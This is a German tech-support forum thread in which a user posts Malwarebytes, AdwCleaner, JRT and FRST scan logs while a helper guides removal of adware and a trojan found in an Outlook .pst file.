C:\Users\*****\AppData\Local\Temp\4wSV1AXm.exe.part (PUP.Optional.Somoto) -> Keine Aktion durchgeführt.
C:\Users\*****\AppData\Local\Temp\JeCbx_5v.exe.part (PUP.Optional.SweetIM) -> Keine Aktion durchgeführt.

(Ende)
         

MBAM-Quickscan-log-2014-01-15 (09-20-02) - entferne Auswahl gewählt.txt
Code:
ATTFilter
Malwarebytes Anti-Malware 1.75.0.1300
www.malwarebytes.org

Datenbank Version: v2014.01.15.02

Windows 7 Service Pack 1 x64 NTFS
Internet Explorer 11.0.9600.16476
***** :: *****-PC [Administrator]

15.01.2014 09:06:41
mbam-log-2014-01-15 (09-06-41).txt

Art des Suchlaufs: Quick-Scan
Aktivierte Suchlaufeinstellungen: Speicher | Autostart | Registrierung | Dateisystem | Heuristiks/Extra | HeuristiKs/Shuriken | PUP | PUM
Deaktivierte Suchlaufeinstellungen: P2P
Durchsuchte Objekte: 310708
Laufzeit: 9 Minute(n), 8 Sekunde(n)

Infizierte Speicherprozesse: 0
(Keine bösartigen Objekte gefunden)

Infizierte Speichermodule: 0
(Keine bösartigen Objekte gefunden)

Infizierte Registrierungsschlüssel: 2
HKCU\Software\InstallCore\1I1T1Q1S (PUP.Optional.InstallCore.A) -> Erfolgreich gelöscht und in Quarantäne gestellt.
HKCU\SOFTWARE\INSTALLCORE (PUP.Optional.InstallCore.A) -> Erfolgreich gelöscht und in Quarantäne gestellt.

Infizierte Registrierungswerte: 1
HKCU\Software\InstallCore|tb (PUP.Optional.InstallCore.A) -> Daten: 1W1G1U1K1O1H -> Erfolgreich gelöscht und in Quarantäne gestellt.

Infizierte Dateiobjekte der Registrierung: 0
(Keine bösartigen Objekte gefunden)

Infizierte Verzeichnisse: 0
(Keine bösartigen Objekte gefunden)

Infizierte Dateien: 4
C:\$Recycle.Bin\S-1-5-21-1797653687-739084669-777346648-1001\$ROMGUCE.exe (PUP.Optional.RegCleanerPro) -> Erfolgreich gelöscht und in Quarantäne gestellt.
C:\$Recycle.Bin\S-1-5-21-1797653687-739084669-777346648-1001\$RWBRD16.zip (Backdoor.Agent.WRRGen) -> Erfolgreich gelöscht und in Quarantäne gestellt.
C:\Users\*****\AppData\Local\Temp\4wSV1AXm.exe.part (PUP.Optional.Somoto) -> Erfolgreich gelöscht und in Quarantäne gestellt.
C:\Users\*****\AppData\Local\Temp\JeCbx_5v.exe.part (PUP.Optional.SweetIM) -> Erfolgreich gelöscht und in Quarantäne gestellt.

(Ende)
         
Miniaturansicht angehängter Grafiken
TR/Crypt.Xpack.41536 in der Outlook .pst-alle.jpg  

Alt 15.01.2014, 10:31   #2
schrauber
/// the machine
/// TB-Ausbilder
 

TR/Crypt.Xpack.41536 in der Outlook .pst - Standard

TR/Crypt.Xpack.41536 in der Outlook .pst



hi,

Downloade Dir bitte TFC ( von Oldtimer ) und speichere die Datei auf dem Desktop.
Schließe nun alle offenen Programme und trenne Dich von dem Internet.
Doppelklick auf die TFC.exe und drücke auf Start.
Sollte TFC nicht alle Dateien löschen können wird es einen Neustart verlangen. Dies bitte zulassen.



Downloade Dir bitte AdwCleaner Logo Icon AdwCleaner auf deinen Desktop.
  • Schließe alle offenen Programme und Browser. Bebilderte Anleitung zu AdwCleaner.
  • Starte die AdwCleaner.exe mit einem Doppelklick.
  • Stimme den Nutzungsbedingungen zu.
  • Klicke auf Optionen und vergewissere dich, dass die folgenden Punkte ausgewählt sind:
    • "Tracing" Schlüssel löschen
    • Winsock Einstellungen zurücksetzen
    • Proxy Einstellungen zurücksetzen
    • Internet Explorer Richtlinien zurücksetzen
    • Chrome Richtlinien zurücksetzen
    • Stelle sicher, dass alle 5 Optionen wie hier dargestellt, ausgewählt sind
  • Klicke auf Suchlauf und warte bis dieser abgeschlossen ist.
  • Klicke nun auf Löschen und bestätige auftretende Hinweise mit Ok.
  • Dein Rechner wird automatisch neu gestartet. Nach dem Neustart öffnet sich eine Textdatei. Poste mir deren Inhalt mit deiner nächsten Antwort.
  • Die Logdatei findest du auch unter C:\AdwCleaner\AdwCleaner[Cx].txt. (x = fortlaufende Nummer).

Beende bitte Deine Schutzsoftware um eventuelle Konflikte zu vermeiden.
Bitte lade Junkware Removal Tool auf Deinen Desktop

  • Starte das Tool mit Doppelklick. Ab Windows Vista (oder höher) bitte mit Rechtsklick "als Administrator ausführen" starten.
  • Drücke eine beliebige Taste, um das Tool zu starten.
  • Je nach System kann der Scan eine Weile dauern.
  • Wenn das Tool fertig ist wird das Logfile (JRT.txt) auf dem Desktop gespeichert und automatisch geöffnet.
  • Bitte poste den Inhalt der JRT.txt in Deiner nächsten Antwort.


und ein frisches FRST log bitte.


Für Outlook:
Einzige Chance ist die PST DAtei wieder zu importieren und manuell zu suchen, welche Email oder welcher Anhang da betroffen ist und den löschen.
__________________

__________________

Alt 15.01.2014, 12:04   #3
franz12
 
TR/Crypt.Xpack.41536 in der Outlook .pst - Standard

TR/Crypt.Xpack.41536 in der Outlook .pst



Vielen Dank - hier unten die neuen Logs.

Bzgl. Outlook... .pst. Meinen Sie, dass ich die Ordner auf verdächtige Mails durchsehen soll und dann diese lokal speichere und dann scanne. Gibt es hier irgendwelche Tools? Generell kann ich mir kaum vorstellen, dass Viren ins Outlook kommen. Zuerst werden die Mails von einem der großen Hoster geprüft, dann von microsoft security essentials, dann von Outlook selbst und schlussendlich entscheide ich noch, was ich öffne. Ich verstehe nicht ganz, wie hier Viren in die PST kommen.
Kann die .pst generell infiziert sein (die ganze Datei), oder geht es immer nur um einzelne Mails, die in der .pst liegen?

TFC ( von Oldtimer )
Code:
ATTFilter
Getting user folders.
 
Stopping running processes.
 
Emptying Temp folders.
 
 
User: Admin
->Temp folder emptied: 10172507 bytes
->Temporary Internet Files folder emptied: 1350191 bytes
->Java cache emptied: 842 bytes
->FireFox cache emptied: 82977884 bytes
->Flash cache emptied: 592 bytes
 
User: All Users
 
User: Default
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Flash cache emptied: 41620 bytes
 
User: Default User
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Flash cache emptied: 0 bytes
 
User: *****
->Temp folder emptied: 11231320715 bytes
->Temporary Internet Files folder emptied: 754312207 bytes
->Java cache emptied: 36578 bytes
->FireFox cache emptied: 437468929 bytes
->Google Chrome cache emptied: 21853849 bytes
->Apple Safari cache emptied: 128000 bytes
->Flash cache emptied: 89297 bytes
 
User: Public
 
User: test
->Temp folder emptied: 1003760 bytes
->Temporary Internet Files folder emptied: 172796 bytes
->Java cache emptied: 0 bytes
->FireFox cache emptied: 86578084 bytes
->Flash cache emptied: 42256 bytes
 
User: UpdatusUser
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Flash cache emptied: 41620 bytes
 
%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 0 bytes
%systemroot%\System32 (64bit) .tmp files removed: 0 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 1007627252 bytes
%systemroot%\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files folder emptied: 33298 bytes
%systemroot%\system32\config\systemprofile\AppData\LocalLow\Sun\Java\Deployment folder emptied: 755 bytes
%systemroot%\sysnative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files folder emptied: 42304047 bytes
 
Emptying RecycleBin. Do not interrupt.
 
RecycleBin emptied: 72697355433 bytes
Process complete!
 
Total Files Cleaned = 82.374,00 mb
         
AdwCleaner
AdwCleaner Logfile:
Code:
ATTFilter
# AdwCleaner v3.017 - Bericht erstellt am 15/01/2014 um 11:04:12
# Aktualisiert 12/01/2014 von Xplode
# Betriebssystem : Windows 7 Home Premium Service Pack 1 (64 bits)
# Benutzername : ***** - *****-PC
# Gestartet von : G:\Users\*****\Documents\*****\***** Hacker\trojaner-board.de\adwcleaner.exe
# Option : Löschen

***** [ Dienste ] *****


***** [ Dateien / Ordner ] *****

Ordner Gelöscht : C:\ProgramData\Partner
Ordner Gelöscht : C:\Program Files (x86)\Vuze
Ordner Gelöscht : C:\Program Files (x86)\Common Files\DVDVideoSoft\TB
Ordner Gelöscht : C:\Users\*****\AppData\Roaming\dvdvideosoftiehelpers
Ordner Gelöscht : C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\c0zhqkuq.default\Extensions\{ACAA314B-EEBA-48E4-AD47-84E31C44796C}
Datei Gelöscht : C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\c0zhqkuq.default\user.js
Datei Gelöscht : C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\user.js

***** [ Verknüpfungen ] *****


***** [ Registrierungsdatenbank ] *****

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\secman.DLL
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\WLXQuickTimeShellExt.DLL
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\protector_dll.protectorbho
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\protector_dll.protectorbho.1
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\secman.OutlookSecurityManager
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\secman.OutlookSecurityManager.1
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\AskInstallChecker-1_RASAPI32
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\AskInstallChecker-1_RASMANCS
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\SoftonicDownloader_fuer_free-3d-photo-maker_RASAPI32
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\SoftonicDownloader_fuer_free-3d-photo-maker_RASMANCS
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\{0A18A436-2A7A-49F3-A488-30538A2F6323}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\{4D076AB4-7562-427A-B5D2-BD96E19DEE56}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{007EFBDF-8A5D-4930-97CC-A4B437CBA777}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{66EEF543-A9AC-4A9D-AA3C-1ED148AC8EEE}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{826D7151-8D99-434B-8540-082B8C2AE556}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{66EEF543-A9AC-4A9D-AA3C-1ED148AC8EEE}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{66EEF543-A9AC-4A9D-AA3C-1ED148AC8FFE}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\TypeLib\{11549FE4-7C5A-4C17-9FC3-56FC5162A994}
Schlüssel Gelöscht : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{70D46D94-BF1E-45ED-B567-48701376298E}
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{66EEF543-A9AC-4A9D-AA3C-1ED148AC8EEE}
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{66EEF543-A9AC-4A9D-AA3C-1ED148AC8FFE}
Schlüssel Gelöscht : HKCU\Software\OCS
Schlüssel Gelöscht : HKCU\Software\Softonic
Schlüssel Gelöscht : HKCU\Software\YahooPartnerToolbar

***** [ Browser ] *****

-\\ Internet Explorer v11.0.9600.16428


-\\ Mozilla Firefox v26.0 (de)

[ Datei : C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\c0zhqkuq.default\prefs.js ]


[ Datei : C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\prefs.js ]


[ Datei : C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jla7zlsk.default\prefs.js ]


[ Datei : C:\Users\test\AppData\Roaming\Mozilla\Firefox\Profiles\fag0belg.default\prefs.js ]


-\\ Google Chrome v31.0.1650.63

[ Datei : C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\preferences ]


*************************

AdwCleaner[R0].txt - [4195 octets] - [15/01/2014 10:47:53]
AdwCleaner[S0].txt - [3835 octets] - [15/01/2014 11:04:12]

########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [3895 octets] ##########
         
--- --- ---


Junkware Removal Tool
Code:
ATTFilter
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.1.0 (01.07.2014:1)
OS: Windows 7 Home Premium x64
Ran by ***** on 15.01.2014 at 11:39:42,63
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




~~~ Services



~~~ Registry Values



~~~ Registry Keys

Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\caphyon
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\caphyon
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\updatewhilokii_rasapi32
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\updatewhilokii_rasmancs



~~~ Files



~~~ Folders

Successfully deleted: [Folder] "C:\Users\*****\AppData\Roaming\getrighttogo"



~~~ FireFox

Emptied folder: C:\Users\*****\AppData\Roaming\mozilla\firefox\profiles\v60bhm7j.default\minidumps [185 files]



~~~ Event Viewer Logs were cleared





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 15.01.2014 at 11:45:06,99
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
         
ein frisches FRST log

FRST Logfile:

FRST Logfile:
Code:
ATTFilter
Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 15-01-2014
Ran by ***** (administrator) on *****-PC on 15-01-2014 11:45:57
Running from G:\Users\*****\Documents\*****\***** Hacker\trojaner-board.de
Windows 7 Home Premium Service Pack 1 (X64) OS Language: German Standard
Internet Explorer Version 11
Boot Mode: Normal

The only official downoad link fo FRST:
Download link for 32-Bit version: hxxp://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/ 
Download link for 64-Bit Version: hxxp://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/ 
Download link from any site other than Bleeping Computer is unpermitted or outdated.
See tutorial for FRST: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(SEIKO EPSON CORPORATION) C:\Program Files (x86)\Common Files\EPSON\EBAPI\eEBSvc.exe
(Acronis) C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedul2.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Elements Organizer 8.0\PhotoshopElementsFileAgent.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVM Berlin) C:\Program Files\FRITZ!Fernzugang\avmike.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(AVM Berlin) C:\Program Files\FRITZ!Fernzugang\certsrv.exe
(Devguru Co., Ltd.) C:\Windows\SysWOW64\dgdersvc.exe
(Microsoft Corporation) C:\Program Files\Windows Home Server\esClient.exe
() C:\HS3 Hotelsoftware\DB-Server\bin\fbguard_hs3sr.exe
() C:\Program Files (x86)\Adobe\Adobe Version Cue CS2\data\database\bin\mysqld-nt.exe
(Acer Incorporated) C:\Program Files (x86)\Acer\Registration\GregHSRW.exe
(Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\HauppaugeTVServer.exe
() C:\ProgramData\DatacardService\HWDeviceService64.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe
(Microsoft Corporation) C:\Program Files\Microsoft LifeCam\MSCamS64.exe
(Egis Technology Inc.) C:\Program Files (x86)\EgisTec\MyWinLocker 3\x86\MWLService.exe
(NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe
(AVM Berlin) C:\Program Files\FRITZ!Fernzugang\nwtsrv.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
() C:\Program Files (x86)\Common Files\Acronis\Fomatik\TrueImageTryStartService.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamgui.exe
(Egis Technology Inc.) C:\Program Files (x86)\EgisTec\MyWinLocker 3\x86\mwlDaemon.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAAnotif.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Acronis) C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedhlp.exe
(Microsoft Corporation) C:\Windows\vVX1000.exe
(Microsoft Corporation) C:\Windows\WindowsMobile\wmdc.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Huawei Technologies Co., Ltd.) C:\ProgramData\DatacardService\DCSHelper.exe
() C:\OEM\USBDECTION\USBS3S4Detection.exe
(Microsoft Corporation) C:\Program Files\Windows Home Server\Microsoft.HomeServer.Archive.TransferService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe
() C:\Program Files (x86)\Acer\Hotkey Utility\HotkeyUtility.exe
(Egis Technology Inc.) C:\Program Files (x86)\EgisTec Egis Software Update\EgisUpdate.exe
(CyberLink Corp.) C:\Program Files (x86)\Acer Arcade Deluxe\Acer Arcade Deluxe\ArcadeDeluxeAgent.exe
(Acer Corp.) C:\Program Files (x86)\Acer Arcade Deluxe\PlayMovie\PMVService.exe
(Adobe Sytems Incorporated) C:\Program Files (x86)\Adobe\Adobe Version Cue CS2\ControlPanel\VersionCueCS2Tray.exe
(Adobe Systems Inc.) C:\Program Files (x86)\Adobe\Adobe Acrobat 7.0\Distillr\acrotray.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Brother\Brmfcmon\BrMfcWnd.exe
(Acronis) C:\Program Files (x86)\Acronis\TrueImageHome\TrueImageMonitor.exe
(Acronis) C:\Program Files (x86)\Acronis\TrueImageHome\TimounterMonitor.exe
(Google) C:\Program Files (x86)\Google\Google Desktop Search\GoogleDesktop.exe
() C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Brother\ControlCenter3\BrccMCtl.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Brother\Brmfcmon\BrMfimon.exe
(Audible, Inc.) C:\Program Files (x86)\Audible\Bin\AudibleDownloadHelper.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAANTmon.exe
(Microsoft Corporation) C:\Program Files\Windows Home Server\WHSConnector.exe
(pdfforge  hxxp://www.pdfforge.org/) C:\Program Files (x86)\Common Files\PDFCreator\PDFCreator.exe
() C:\Program Files (x86)\Northstar\SmartCopy\SmartCopy.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Firebird Project) C:\HS3 Hotelsoftware\DB-Server\bin\fbserver_hs3sr.exe
(North Star com.) C:\Program Files (x86)\Northstar\SmartLauncher\SmartLauncher.exe
(Microsoft Corporation) C:\Program Files\Windows Home Server\WHSTrayApp.exe
(Hauppauge Computer Works, Inc.) C:\Program Files (x86)\WinTV\WinTV7\WinTVTray.exe
(Dropbox, Inc.) C:\Users\*****\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Microsoft Corporation) C:\Windows\System32\prevhost.exe
(Helios Software Solutions) C:\Program Files (x86)\TextPad 4\TextPad.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\SysWOW64\notepad.exe


==================== Registry (Whitelisted) ==================

HKLM\...\Run: [mwlDaemon] - C:\Program Files (x86)\EgisTec\MyWinLocker 3\x86\mwlDaemon.exe [349480 2009-09-10] (Egis Technology Inc.)
HKLM\...\Run: [IAAnotif] - C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\iaanotif.exe [186904 2009-10-13] (Intel Corporation)
HKLM\...\Run: [RtHDVCpl] - C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [8312352 2009-10-28] (Realtek Semiconductor)
HKLM\...\Run: [OOTag] - C:\windows\oobeoffer\oobeoffer\ootag.exe [23072 2009-09-28] (Microsoft)
HKLM\...\Run: [Acronis Scheduler2 Service] - C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedhlp.exe [140568 2007-08-31] (Acronis)
HKLM\...\Run: [VX1000] - C:\Windows\vVX1000.exe [762736 2010-05-20] (Microsoft Corporation)
HKLM\...\Run: [Windows Mobile Device Center] - C:\Windows\WindowsMobile\wmdc.exe [660360 2007-05-31] (Microsoft Corporation)
HKLM\...\Run: [MSC] - C:\Program Files\Microsoft Security Client\msseces.exe [1266912 2013-10-23] (Microsoft Corporation)
HKLM\...\Run: [AdobeAAMUpdater-1.0] - C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [472992 2013-03-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [JMB36X IDE Setup] - C:\Windows\RaidTool\xInsIDE.exe [36864 2007-03-20] ()
HKLM-x32\...\Run: [BackupManagerTray] - C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe [261888 2009-08-12] (NewTech Infosystems, Inc.)
HKLM-x32\...\Run: [Hotkey Utility] - C:\Program Files (x86)\Acer\Hotkey Utility\HotkeyUtility.exe [609312 2010-05-06] ()
HKLM-x32\...\Run: [EgisTecLiveUpdate] - C:\Program Files (x86)\EgisTec Egis Software Update\EgisUpdate.exe [199464 2009-08-04] (Egis Technology Inc.)
HKLM-x32\...\Run: [ArcadeDeluxeAgent] - C:\Program Files (x86)\Acer Arcade Deluxe\Acer Arcade Deluxe\ArcadeDeluxeAgent.exe [128296 2009-11-16] (CyberLink Corp.)
HKLM-x32\...\Run: [PlayMovie] - C:\Program Files (x86)\Acer Arcade Deluxe\PlayMovie\PMVService.exe [181480 2009-11-12] (Acer Corp.)
HKLM-x32\...\Run: [TrayServer] - C:\Program Files (x86)\MAGIX\Video_deluxe_15\Trayserver.exe [90112 2008-08-07] (MAGIX AG)
HKLM-x32\...\Run: [Adobe Version Cue CS2] - C:\Program Files (x86)\Adobe\Adobe Version Cue CS2\ControlPanel\VersionCueCS2Tray.exe [856064 2005-04-06] (Adobe Sytems Incorporated)
HKLM-x32\...\Run: [Acrobat Assistant 7.0] - C:\Program Files (x86)\Adobe\Adobe Acrobat 7.0\Distillr\acrotray.exe [483328 2008-04-23] (Adobe Systems Inc.)
HKLM-x32\...\Run: [] - [x]
HKLM-x32\...\Run: [BrMfcWnd] - C:\Program Files (x86)\Brother\Brmfcmon\BrMfcWnd.exe [1159168 2009-05-26] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [ControlCenter3] - C:\Program Files (x86)\Brother\ControlCenter3\brctrcen.exe [114688 2008-12-24] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [TrueImageMonitor.exe] - C:\Program Files (x86)\Acronis\TrueImageHome\TrueImageMonitor.exe [2622232 2007-08-31] (Acronis)
HKLM-x32\...\Run: [AcronisTimounterMonitor] - C:\Program Files (x86)\Acronis\TrueImageHome\TimounterMonitor.exe [907040 2007-08-31] (Acronis)
HKLM-x32\...\Run: [Google Desktop Search] - C:\Program Files (x86)\Google\Google Desktop Search\GoogleDesktop.exe [30192 2010-12-20] (Google)
HKLM-x32\...\Run: [LifeCam] - C:\Program Files (x86)\Microsoft LifeCam\LifeExp.exe [119152 2010-05-20] (Microsoft Corporation)
HKLM-x32\...\Run: [DivXUpdate] - C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe [1259376 2011-07-29] ()
HKLM-x32\...\Run: [Adobe ARM] - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [APSDaemon] - C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59280 2012-11-28] (Apple Inc.)
HKLM-x32\...\Run: [iTunesHelper] - C:\Program Files (x86)\iTunes\iTunesHelper.exe [152544 2012-12-12] (Apple Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] - C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [254336 2013-07-02] (Oracle Corporation)
HKCU\...\Run: [swg] - C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2009-11-18] (Google Inc.)
HKCU\...\Run: [updateMgr] - C:\Program Files (x86)\Adobe\Adobe Acrobat 7.0\Acrobat\AdobeUpdateManager.exe [313472 2006-03-30] (Adobe Systems Incorporated)
HKCU\...\Run: [KiesTrayAgent] - C:\Program Files (x86)\Samsung\Kies\/\KiesTrayAgent.exe [3365176 2010-05-14] (Samsung Electronics Co., Ltd.)
MountPoints2: {59c8f615-9a4a-11df-a62d-806e6f6e6963} - E:\wubi.exe
MountPoints2: {a6801d55-6f88-11e3-9574-90fba686407f} - I:\AutoRun.exe
MountPoints2: {a6801d61-6f88-11e3-9574-90fba686407f} - I:\AutoRun.exe
HKU\Admin\...\Run: [swg] - C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2009-11-18] (Google Inc.)
HKU\Default\...\RunOnce: [ScrSav] - C:\Program Files (x86)\Acer\Screensaver\run_Acer.exe [162336 2009-07-22] ()
HKU\Default User\...\RunOnce: [ScrSav] - C:\Program Files (x86)\Acer\Screensaver\run_Acer.exe [162336 2009-07-22] ()
HKU\UpdatusUser\...\RunOnce: [ScrSav] - C:\Program Files (x86)\Acer\Screensaver\run_Acer.exe [162336 2009-07-22] ()
AppInit_DLLs-x32: C:\PROGRA~2\Google\GOOGLE~3\GO36F4~1.DLL [123392 2010-12-20] (Google)
Lsa: [Authentication Packages] msv1_0 relog_ap
Startup: C:\Users\*****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
ShortcutTarget: Dropbox.lnk -> C:\Users\*****\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)

==================== Internet (Whitelisted) ====================

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_m7811&r=17361210n705pe426v155w5741u221
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_m7811&r=17361210n705pe426v155w5741u221
SearchScopes: HKLM-x32 - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW
SearchScopes: HKCU - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW_deAT409AT409
BHO: Easy Photo Print - {9421DD08-935F-4701-A9CA-22DF90AC4EA6} - C:\Program Files (x86)\Epson Software\Easy Photo Print\EPTBL.dll (SEIKO EPSON CORPORATION / CyCom Technology Corp.)
BHO: BrowserHelper Class - {9A065C65-4EE7-4DDD-9918-F129089A894A} - C:\Program Files\Windows Home Server\WHSDeskBands.dll (Microsoft Corporation)
BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
BHO-x32: Adobe PDF Reader - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll (Adobe Systems Incorporated)
BHO-x32: No Name - {5C255C8A-E604-49b4-9D64-90988571CECB} -  No File
BHO-x32: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
